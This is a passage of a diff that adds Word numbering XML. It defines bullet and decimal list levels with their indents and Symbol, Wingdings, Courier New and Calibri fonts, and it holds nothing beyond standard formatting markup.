+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="45A04B6C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="51DCB3DC"/>
+    <w:lvl w:ilvl="0" w:tplc="08090005">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7920" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="8640" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="48106167"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E60CD598"/>
+    <w:lvl w:ilvl="0" w:tplc="08090005">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4A567B8C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="AF749F56"/>
+    <w:lvl w:ilvl="0" w:tplc="3F38D8DA">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7920" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="56F06E6B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9B489BAC"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="662D1B3C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EFEE479C"/>
+    <w:lvl w:ilvl="0" w:tplc="0809000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="666F0EA3"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6C30CA14"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="69CF7DA5"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="BFD62A44"/>
+    <w:lvl w:ilvl="0" w:tplc="3F38D8DA">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
